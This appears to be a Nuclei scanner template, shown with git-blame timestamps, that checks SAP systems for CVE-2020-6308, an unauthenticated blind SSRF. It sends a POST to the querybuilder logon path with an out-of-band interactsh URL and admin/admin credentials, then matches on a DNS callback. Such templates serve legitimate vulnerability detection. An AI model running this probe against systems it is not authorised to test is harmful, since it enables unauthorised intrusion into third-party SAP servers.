2021-06-02 06:09:27 +00:00
|
|
|
id: CVE-2020-6308
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Unauthenticated Blind SSRF in SAP
|
|
|
|
author: madrobot
|
|
|
|
severity: medium
|
2021-06-04 18:30:50 +00:00
|
|
|
reference: https://github.com/InitRoot/CVE-2020-6308-PoC
|
2021-06-04 18:32:33 +00:00
|
|
|
tags: cve,cve2020,sap,ssrf,oob
|
2021-06-02 06:09:27 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
|
|
|
|
|
|
|
|
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
|
|
words:
|
|
|
|
- "dns"
|